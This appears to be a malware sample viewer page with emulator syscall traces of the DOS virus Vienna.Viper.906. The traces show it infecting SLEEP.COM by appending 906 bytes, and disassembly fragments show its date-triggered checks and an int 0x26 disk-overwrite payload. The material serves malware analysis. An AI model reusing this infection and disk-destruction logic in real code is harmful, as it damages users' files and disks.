Sample viewer

vx.netlux.org/Virus.DOS.Vienna.Viper.906

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:10:01.717029794Z 255 PC: 12a49 | UNKNOWN!
2018-12-17T23:10:01.719611506Z 48 PC: 12a68 | Get DOS version
2018-12-17T23:10:01.721432328Z 44 PC: 12a74 | Get time 0x12a74: xor bx, bx
0x12a76: cmp dl, 4
0x12a79: jle 0x12a7d
0x12a7b: jmp 0x12a8f
0x12a7d: mov dl, byte ptr [bx + si + 0x8f]
0x12a81: or dl, dl
0x12a83: je 0x12a8f
0x12a85: sub dl, 0x4b
0x12a88: mov ah, 2
0x12a8a: int 0x21
0x12a8c: inc bx
0x12a8d: jmp 0x12a7d
0x12a8f: mov ah, 0x2a
0x12a91: int 0x21
0x12a93: cmp dh, 3
0x12a96: jne 0x12ad8
0x12a98: cmp dl, 0x18
0x12a9b: jne 0x12ad8
0x12a9d: mov ah, 0x2c
0x12a9f: int 0x21
2018-12-17T23:10:01.724392301Z 42 PC: 12a93 | Get date 0x12a93: cmp dh, 3
0x12a96: jne 0x12ad8
0x12a98: cmp dl, 0x18
0x12a9b: jne 0x12ad8
0x12a9d: mov ah, 0x2c
0x12a9f: int 0x21
0x12aa1: cmp ch, 7
0x12aa4: jne 0x12ad8
0x12aa6: cmp cl, 0x2d
0x12aa9: jne 0x12ad8
0x12aab: xor bx, bx
0x12aad: mov dl, byte ptr [bx + si + 0xf1]
0x12ab1: or dl, dl
0x12ab3: je 0x12abf
0x12ab5: sub dl, 0x4b
0x12ab8: mov ah, 2
0x12aba: int 0x21
0x12abc: inc bx
0x12abd: jmp 0x12aad
0x12abf: mov al, 0
2018-12-17T23:10:01.727236366Z 47 PC: 12add | Get disk transfer address
2018-12-17T23:10:01.730352522Z 26 PC: 12aee | Set disk transfer address
2018-12-17T23:10:01.732188603Z 78 PC: 12b77 | Find first file
2018-12-17T23:10:01.739928309Z 67 PC: 12bb3 | Get or set file attributes
2018-12-17T23:10:01.748284442Z 67 PC: 12bc5 | Get or set file attributes
2018-12-17T23:10:01.765788619Z 61 PC: 12bd1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:10:01.773729062Z 87 PC: 12bde | Get or set file date and time
2018-12-17T23:10:01.776615646Z 63 PC: 12bf2 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:10:01.78438617Z 66 PC: 12c03 | Move file pointer
2018-12-17T23:10:01.786088699Z 64 PC: 12c29 | Write file or device (Write 906 bytes on handle 5)
2018-12-17T23:10:01.796501108Z 66 PC: 12c3a | Move file pointer
2018-12-17T23:10:01.798679592Z 64 PC: 12c4a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:10:01.807007383Z 87 PC: 12c5e | Get or set file date and time
2018-12-17T23:10:01.809607229Z 62 PC: 12c63 | Close file
2018-12-17T23:10:01.824437029Z 67 PC: 12c72 | Get or set file attributes
2018-12-17T23:10:01.840456094Z 26 PC: 12c7e | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16727,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:38.313005333Z 255 PC: 12a49 | UNKNOWN!
2018-12-25T12:53:38.321092092Z 48 PC: 12a68 | Get DOS version
2018-12-25T12:53:38.322175529Z 44 PC: 12a74 | Get time 0x12a74: xor bx, bx
0x12a76: cmp dl, 4
0x12a79: jle 0x12a7d
0x12a7b: jmp 0x12a8f
0x12a7d: mov dl, byte ptr [bx + si + 0x8f]
0x12a81: or dl, dl
0x12a83: je 0x12a8f
0x12a85: sub dl, 0x4b
0x12a88: mov ah, 2
0x12a8a: int 0x21
0x12a8c: inc bx
0x12a8d: jmp 0x12a7d
0x12a8f: mov ah, 0x2a
0x12a91: int 0x21
0x12a93: cmp dh, 3
0x12a96: jne 0x12ad8
0x12a98: cmp dl, 0x18
0x12a9b: jne 0x12ad8
0x12a9d: mov ah, 0x2c
0x12a9f: int 0x21
2018-12-25T12:53:38.324147134Z 42 PC: 12a93 | Get date 0x12a93: cmp dh, 3
0x12a96: jne 0x12ad8
0x12a98: cmp dl, 0x18
0x12a9b: jne 0x12ad8
0x12a9d: mov ah, 0x2c
0x12a9f: int 0x21
0x12aa1: cmp ch, 7
0x12aa4: jne 0x12ad8
0x12aa6: cmp cl, 0x2d
0x12aa9: jne 0x12ad8
0x12aab: xor bx, bx
0x12aad: mov dl, byte ptr [bx + si + 0xf1]
0x12ab1: or dl, dl
0x12ab3: je 0x12abf
0x12ab5: sub dl, 0x4b
0x12ab8: mov ah, 2
0x12aba: int 0x21
0x12abc: inc bx
0x12abd: jmp 0x12aad
0x12abf: mov al, 0
2018-12-25T12:53:38.331837728Z 47 PC: 12add | Get disk transfer address
2018-12-25T12:53:38.333103262Z 26 PC: 12aee | Set disk transfer address
2018-12-25T12:53:38.334136065Z 78 PC: 12b77 | Find first file
2018-12-25T12:53:38.340093133Z 67 PC: 12bb3 | Get or set file attributes
2018-12-25T12:53:38.345655709Z 67 PC: 12bc5 | Get or set file attributes
2018-12-25T12:53:38.361096341Z 61 PC: 12bd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:53:38.367337392Z 87 PC: 12bde | Get or set file date and time
2018-12-25T12:53:38.369083164Z 63 PC: 12bf2 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:53:38.375566233Z 66 PC: 12c03 | Move file pointer
2018-12-25T12:53:38.377085515Z 64 PC: 12c29 | Write file or device (Write 906 bytes on handle 5)
2018-12-25T12:53:38.38620503Z 66 PC: 12c3a | Move file pointer
2018-12-25T12:53:38.387482797Z 64 PC: 12c4a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:53:38.39404069Z 87 PC: 12c5e | Get or set file date and time
2018-12-25T12:53:38.404332873Z 62 PC: 12c63 | Close file
2018-12-25T12:53:38.412013307Z 67 PC: 12c72 | Get or set file attributes
2018-12-25T12:53:38.421624913Z 26 PC: 12c7e | Set disk transfer address

{"DateBased":true,"Day":1,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16727,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:38.48132398Z 255 PC: 12a49 | UNKNOWN!
2018-12-25T12:53:38.483051617Z 48 PC: 12a68 | Get DOS version
2018-12-25T12:53:38.48413763Z 44 PC: 12a74 | Get time 0x12a74: xor bx, bx
0x12a76: cmp dl, 4
0x12a79: jle 0x12a7d
0x12a7b: jmp 0x12a8f
0x12a7d: mov dl, byte ptr [bx + si + 0x8f]
0x12a81: or dl, dl
0x12a83: je 0x12a8f
0x12a85: sub dl, 0x4b
0x12a88: mov ah, 2
0x12a8a: int 0x21
0x12a8c: inc bx
0x12a8d: jmp 0x12a7d
0x12a8f: mov ah, 0x2a
0x12a91: int 0x21
0x12a93: cmp dh, 3
0x12a96: jne 0x12ad8
0x12a98: cmp dl, 0x18
0x12a9b: jne 0x12ad8
0x12a9d: mov ah, 0x2c
0x12a9f: int 0x21
2018-12-25T12:53:38.486097307Z 42 PC: 12a93 | Get date 0x12a93: cmp dh, 3
0x12a96: jne 0x12ad8
0x12a98: cmp dl, 0x18
0x12a9b: jne 0x12ad8
0x12a9d: mov ah, 0x2c
0x12a9f: int 0x21
0x12aa1: cmp ch, 7
0x12aa4: jne 0x12ad8
0x12aa6: cmp cl, 0x2d
0x12aa9: jne 0x12ad8
0x12aab: xor bx, bx
0x12aad: mov dl, byte ptr [bx + si + 0xf1]
0x12ab1: or dl, dl
0x12ab3: je 0x12abf
0x12ab5: sub dl, 0x4b
0x12ab8: mov ah, 2
0x12aba: int 0x21
0x12abc: inc bx
0x12abd: jmp 0x12aad
0x12abf: mov al, 0
2018-12-25T12:53:38.488226164Z 47 PC: 12add | Get disk transfer address
2018-12-25T12:53:38.48958885Z 26 PC: 12aee | Set disk transfer address
2018-12-25T12:53:38.490624768Z 78 PC: 12b77 | Find first file
2018-12-25T12:53:38.49637149Z 67 PC: 12bb3 | Get or set file attributes
2018-12-25T12:53:38.502895975Z 67 PC: 12bc5 | Get or set file attributes
2018-12-25T12:53:38.520974779Z 61 PC: 12bd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:53:38.533079903Z 87 PC: 12bde | Get or set file date and time
2018-12-25T12:53:38.53552932Z 63 PC: 12bf2 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:53:38.541583219Z 66 PC: 12c03 | Move file pointer
2018-12-25T12:53:38.542861335Z 64 PC: 12c29 | Write file or device (Write 906 bytes on handle 5)
2018-12-25T12:53:38.551740335Z 66 PC: 12c3a | Move file pointer
2018-12-25T12:53:38.553036646Z 64 PC: 12c4a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:53:38.560150479Z 87 PC: 12c5e | Get or set file date and time
2018-12-25T12:53:38.562202727Z 62 PC: 12c63 | Close file
2018-12-25T12:53:38.582298819Z 67 PC: 12c72 | Get or set file attributes
2018-12-25T12:53:38.592655193Z 26 PC: 12c7e | Set disk transfer address

{"DateBased":true,"Day":24,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16727,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:38.571790279Z 255 PC: 12a49 | UNKNOWN!
2018-12-25T12:53:38.572912371Z 48 PC: 12a68 | Get DOS version
2018-12-25T12:53:38.574415932Z 44 PC: 12a74 | Get time 0x12a74: xor bx, bx
0x12a76: cmp dl, 4
0x12a79: jle 0x12a7d
0x12a7b: jmp 0x12a8f
0x12a7d: mov dl, byte ptr [bx + si + 0x8f]
0x12a81: or dl, dl
0x12a83: je 0x12a8f
0x12a85: sub dl, 0x4b
0x12a88: mov ah, 2
0x12a8a: int 0x21
0x12a8c: inc bx
0x12a8d: jmp 0x12a7d
0x12a8f: mov ah, 0x2a
0x12a91: int 0x21
0x12a93: cmp dh, 3
0x12a96: jne 0x12ad8
0x12a98: cmp dl, 0x18
0x12a9b: jne 0x12ad8
0x12a9d: mov ah, 0x2c
0x12a9f: int 0x21
2018-12-25T12:53:38.576665855Z 42 PC: 12a93 | Get date 0x12a93: cmp dh, 3
0x12a96: jne 0x12ad8
0x12a98: cmp dl, 0x18
0x12a9b: jne 0x12ad8
0x12a9d: mov ah, 0x2c
0x12a9f: int 0x21
0x12aa1: cmp ch, 7
0x12aa4: jne 0x12ad8
0x12aa6: cmp cl, 0x2d
0x12aa9: jne 0x12ad8
0x12aab: xor bx, bx
0x12aad: mov dl, byte ptr [bx + si + 0xf1]
0x12ab1: or dl, dl
0x12ab3: je 0x12abf
0x12ab5: sub dl, 0x4b
0x12ab8: mov ah, 2
0x12aba: int 0x21
0x12abc: inc bx
0x12abd: jmp 0x12aad
0x12abf: mov al, 0
2018-12-25T12:53:38.578991667Z 44 PC: 12aa1 | Get time 0x12aa1: cmp ch, 7
0x12aa4: jne 0x12ad8
0x12aa6: cmp cl, 0x2d
0x12aa9: jne 0x12ad8
0x12aab: xor bx, bx
0x12aad: mov dl, byte ptr [bx + si + 0xf1]
0x12ab1: or dl, dl
0x12ab3: je 0x12abf
0x12ab5: sub dl, 0x4b
0x12ab8: mov ah, 2
0x12aba: int 0x21
0x12abc: inc bx
0x12abd: jmp 0x12aad
0x12abf: mov al, 0
0x12ac1: mov cx, 0xff
0x12ac4: mov dx, 1
0x12ac7: int 0x26
0x12ac9: jb 0x12ace
0x12acb: add sp, 2
0x12ace: inc al
2018-12-25T12:53:38.584306525Z 47 PC: 12add | Get disk transfer address
2018-12-25T12:53:38.585565162Z 26 PC: 12aee | Set disk transfer address
2018-12-25T12:53:38.587067339Z 78 PC: 12b77 | Find first file
2018-12-25T12:53:38.595023845Z 67 PC: 12bb3 | Get or set file attributes
2018-12-25T12:53:38.602057235Z 67 PC: 12bc5 | Get or set file attributes
2018-12-25T12:53:38.620636653Z 61 PC: 12bd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:53:38.628488439Z 87 PC: 12bde | Get or set file date and time
2018-12-25T12:53:38.630060802Z 63 PC: 12bf2 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:53:38.637174628Z 66 PC: 12c03 | Move file pointer
2018-12-25T12:53:38.639059171Z 64 PC: 12c29 | Write file or device (Write 906 bytes on handle 5)
2018-12-25T12:53:38.648597068Z 66 PC: 12c3a | Move file pointer
2018-12-25T12:53:38.650446848Z 64 PC: 12c4a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:53:38.658017153Z 87 PC: 12c5e | Get or set file date and time
2018-12-25T12:53:38.659220259Z 62 PC: 12c63 | Close file
2018-12-25T12:53:38.667766838Z 67 PC: 12c72 | Get or set file attributes
2018-12-25T12:53:38.67955054Z 26 PC: 12c7e | Set disk transfer address